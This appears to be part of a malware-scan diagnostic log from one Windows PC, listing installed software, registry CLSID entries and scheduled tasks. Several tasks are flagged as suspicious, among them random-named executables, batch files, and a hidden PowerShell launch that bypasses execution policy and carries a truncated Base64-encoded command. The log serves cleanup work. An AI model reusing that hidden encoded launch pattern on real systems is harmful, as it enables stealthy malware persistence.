MAGIX Screenshare (HKLM-x32\...\MAGIX Screenshare UK) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM-x32\...\MAGIX Speed burnR UK) (Version: 6.0.1.2 - MAGIX AG)
MAGIX Video easy SE (HKLM-x32\...\MAGIX_MSI_Video_easy_SE) (Version: 1.0.4.1 - MAGIX AG)
MAGIX Video easy SE (x32 Version: 1.0.4.1 - MAGIX AG) Hidden
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Digital Image Pro 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Expression Studio 3 (HKLM-x32\...\ExpressionStudio_3.0.1061.0) (Version: 3.0.1061.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{91110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.2627.01 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{41BC9E31-0D39-462E-8E4C-767B21A3B1C3}) (Version: 3.1.8.0 - Apple Inc.)
Mp3tag v2.52 (HKLM-x32\...\Mp3tag) (Version: v2.52 - Florian Heidenreich)
msi Software Install (HKLM-x32\...\{A840FFFB-3A80-4C24-AB34-BE9F56BEB4CE}) (Version: 3.1000.1005.1101 - Micro-Star International Co., Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Music Manager (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\MusicManager) (Version: - Google, Inc.)
MyHarmony (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.0 - Nikon)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Online Plug-in (x32 Version: 14.2.100.14 - Citrix Systems, Inc.) Hidden
Photo Stamp Remover 6.0 (HKLM-x32\...\Photo Stamp Remover_is1) (Version: 6.0 - SoftOrbits)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.5.0 - Nikon)
Poker Tournament Supervisor (HKLM-x32\...\{93ED8388-3C43-4D49-8081-03A0BE7D4E2F}_is1) (Version: 1.3n - Hermann Sorais)
Poker Tournament Supervisor 2 (HKLM-x32\...\{105094B6-4CE8-4AB8-BC17-DDE37F3DE050}}_is1) (Version: 2.0a - Graph & In)
PokerTracker 3 (remove only) (HKLM-x32\...\PokerTracker3) (Version: - )
PokerTracker 4 (remove only) (HKLM-x32\...\PokerTracker4) (Version: - )
PostgreSQL 8.3 (HKLM-x32\...\{B823632F-3B72-4514-8861-B961CE263224}) (Version: 8.3 - PostgreSQL Global Development Group)
PX5 Advanced Sound Editor (HKLM-x32\...\{276B495F-9DB0-4FC6-BEB0-85C91FC0F5E2}) (Version: 0.9.0.0 - Turtle Beach)
Quicken 2009 (HKLM-x32\...\{ED2A3C11-3EA8-4380-B59C-F2C1832731B0}) (Version: 18.1.1.29 - Intuit)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.8.8 - Intuit)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.2 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.2 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.72.410.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Ringtone Expressions 1.6.0 (HKLM-x32\...\Ringtone Expressions) (Version: 1.6.0 - Gx5 L.L.C.)
RogueKiller version 10 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 10 - Adlice Software)
Samsung Content Viewer (HKLM-x32\...\InstallShield_{980DDB3E-8957-4750-98EB-5D04F61CCEDC}) (Version: 1.0.2 - Samsung)
Samsung Content Viewer (x32 Version: 1.0.2 - Samsung) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.0.2.309 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Self-service Plug-in (x32 Version: 4.2.100.5943 - Citrix Systems, Inc.) Hidden
Sena Bluetooth Device Manager 1.4.2 (HKLM-x32\...\Sena Bluetooth Device Manager) (Version: 1.4.2 - Copyright © 2012 ~ 2013 Sena Technologies Inc.)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Skifta (HKLM-x32\...\Skifta) (Version: 2.6.2.0 - skifta.com)
Skype™ 6.7 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.7.102 - Skype Technologies S.A.)
SMH10 Manager 1.4 (HKLM-x32\...\SMH10 Manager) (Version: 1.4 - Copyright © 2012 SENA Technologies Inc.)
System Control Manager (HKLM-x32\...\{ED9C5D25-55DF-48D8-9328-2AC0D75DE5D8}) (Version: 2.210.0604.006.19 - Micro-Star International Co., Ltd.)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.38843 - TeamViewer)
Texas Hold'em Poker 3D - Deluxe Edition 1.0 (HKLM-x32\...\{E26DEDC7-1A99-4F8C-9615-6DB112E6495B}_is1) (Version: Texas Hold'em Poker 3D - Deluxe Edition - Play + Smile Marketing GmbH)
Text-To-Speech-Runtime (HKLM-x32\...\{7B3F0113-E63C-4D6D-AF19-111A3165CCA2}) (Version: 1.0.0.0 - Magix Development GmbH)
THX TruStudio Pro (HKLM-x32\...\{4FA6CB9A-2972-4AAF-A36E-3C40FCC22395}) (Version: 1.0 - Creative Technology Limited)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version: - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
Turtle Beach WinUSB Driver (HKLM\...\{D7593549-B589-40AB-95F0-5ED5AA14D2BC}) (Version: 1.0.1 - Turtle Beach)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Veetle TV 0.9.18 (HKLM-x32\...\Veetle TV) (Version: 0.9.18 - Veetle, Inc)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.9.0 - Nikon)
Virtual DJ - Atomix Productions (HKLM-x32\...\Virtual DJ - Atomix Productions) (Version: - )
VLC media player 2.0.8 (HKLM-x32\...\VLC media player) (Version: 2.0.8 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 4.6 - Vuze Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7500 - Broadcom Corporation)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB (02/03/2011 2.4.0.0) (HKLM\...\88C277C6E63CBDAF35A096E80A5B97A29A619D3A) (Version: 02/03/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB (05/10/2011 2.4.0.0) (HKLM\...\8751DB371004DC10847CB5D366A319631EA4E3EA) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB (05/10/2011 2.4.0.0) (HKLM\...\9B7C4D96A86401A6757BBE6A4B143083977687BE) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB (08/21/2013 2.5.0.3) (HKLM\...\753B2CC50DC57D399D6A69B8563D5ABD5D9F24D3) (Version: 08/21/2013 2.5.0.3 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB (12/13/2012 2.4.0.0) (HKLM\...\02AD34F29D32C048B03F694998ED36AD51FD3A5E) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB (12/13/2012 2.4.0.0) (HKLM\...\5C4609FFB0CD6B7FB69EF6329744776215ADCA7B) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - ENE (EUCR) USB (12/04/2009 5.89.0.64) (HKLM\...\7F973C87231D745EBF31E772CC38BB9B185D3819) (Version: 12/04/2009 5.89.0.64 - ENE)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012 - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version: - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version: - Yahoo! Inc.)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\win64\npPlayerPlugin.dll (DIRECTV)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {060DD4D9-6920-4821-8A80-EFF6E5791AF4} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {102A620C-F30C-4549-9641-182161BCECEB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {110D4053-AA73-447C-B6B3-48CD31F6572B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {17C357AD-790B-4487-9EF3-85A67A824811} - System32\Tasks\{97B6A379-97C9-430F-B2E5-15B6C598AC3E} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.114.259/en/abandoninstall?page=tsGoogle&installinfo=google-toolbar:offered-installed,google-chrome:notoffered;toolbaroffered
Task: {17CD11FE-A7DA-4D1F-A4CB-1090BBDFF29B} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {1BAAE6FE-C34D-4631-9BB2-16D444231725} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {1C07BC4D-6C83-4929-8C27-27540D33FE03} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {1ED8626C-2400-4582-A967-F9A52267AE24} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {323B5AD8-0CF3-498F-B85C-6889DE79CF89} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat
Task: {3DF820E0-8F46-4EB1-B527-90FB60D07C89} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3E30049C-2379-44D4-8849-EEDC4325D38E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {431A8418-553F-414C-B938-84B7D6C11432} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {44D3ABD7-2C48-49E1-BA82-77979369651E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {45990708-B34A-436F-BE29-9EA605DD416D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {45F5242B-C2FC-4454-9CF1-BE4671B59D6C} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {481D6FE8-8CD0-499D-AA02-DF3B8164C7D1} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {4F094485-564E-4476-86A4-BCFBCC9C239A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {55EE3DBF-57F8-4103-83B5-88720E7EEBD8} - System32\Tasks\{0E6FA772-6156-47E2-AE1D-5EE3A8A05AD9} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2013-07-25] (Skype Technologies S.A.)
Task: {564B49C2-B6F5-4F1E-97F5-C10111DA8EE4} - \{99331EF5-343D-47FD-B006-40F37A0D5E9D} -> No File <==== ATTENTION
Task: {5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {5AF597F4-43A4-4292-9389-1D19188D828F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {5B6A393D-57E5-4198-BD7E-00E0B9EF3F77} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5BD1D165-089F-40BA-8D52-B90C85B1BB0D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {5FDFFDC9-967D-4EDE-A7C3-BEE9A0C27400} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {65D5FB16-42C7-455F-9350-4764AE0293D0} - System32\Tasks\{E4FFFFE0-2787-4DAC-B105-2C808A1A2A4D} => pcalua.exe -a C:\Users\RoNiN\AppData\Local\Temp\jre-8u31-windows-au.exe -d C:\windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1
Task: {675E23A2-F0D8-4806-9687-F581BB0AC6B7} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6A490FA7-CA93-4214-B394-9AB008143C0D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {6B6A2BE2-8A42-4CCE-96D1-DCDE0AA16594} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {6CFB64B8-C96E-4505-B19D-05BFFFDB4366} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {6D890055-866E-4872-979D-B8AB3884F1DC} - System32\Tasks\WMMAWVKOLXONAOYC => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {7F54B173-73A7-455D-B8D3-05CDBEB04D24} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {81C671AC-4BCA-4B4C-B16A-DA9DC94B2032} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {869A0025-9207-4E47-A0E0-83ACF33323CB} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe
Task: {874B492C-C094-4938-A93E-0F5141822989} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {8FD417A1-EAB1-4416-AFED-D43B138420F6} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {974DD040-169D-46B7-B08A-60E9035DA668} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A81D9481-C8A7-47F7-A447-0ACE98E4FAF4} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {AB264965-3447-457B-AC17-BEE07AFCF056} - System32\Tasks\Microsoft\Windows\Media Center\Extender\Update media permissions for Mcx1-RONIN-LAPTOP => C:\Windows\ehome\McxTask.exe
Task: {AD93C7FC-914F-430E-BD55-B2C2535F4E94} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
Task: {BE0F7D0B-3323-406F-AAEF-1A12388A1C9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {C6CF2B0F-A54A-4CCD-88C0-72501BA9267D} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {C84934AC-6228-4A08-9F09-7D7A54133B68} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C94198D0-0BC7-4528-B38A-B285C7D79AC0} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {CC2E5376-92DF-4854-8C3D-F54EED7D6667} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {CEAFA10F-5C90-45F6-BCFE-420DFC90526C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {D3ACB7DB-7815-42A9-A39F-8D89E1EDF573} - System32\Tasks\Pritc => C:\Users\RoNiN\AppData\Local\Temp\is-TIN56.tmp\print.exe <==== ATTENTION
Task: {D92D97F2-2EDF-4800-82E5-E726F16D0395} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DF294663-0E97-4583-81A3-6DA69DA846AC} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {E86953B2-7A47-4920-B975-308AAEEA66E9} - System32\Tasks\BJZJKCUBLH1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: {ED1A577E-497C-4A70-998F-01B3E908FA9B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {FAAA50A7-6B6E-4A1A-B40E-B19F2672A919} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2} - System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAA (the data entry has 9540 more characters).
Task: {FB119739-D5B0-4725-B8A1-6684820F96FB} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD} - \LuckyTab -> No File <==== ATTENTION
Task: {FC5FE3D1-68A5-4CAD-84FC-0A61139E9C31} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
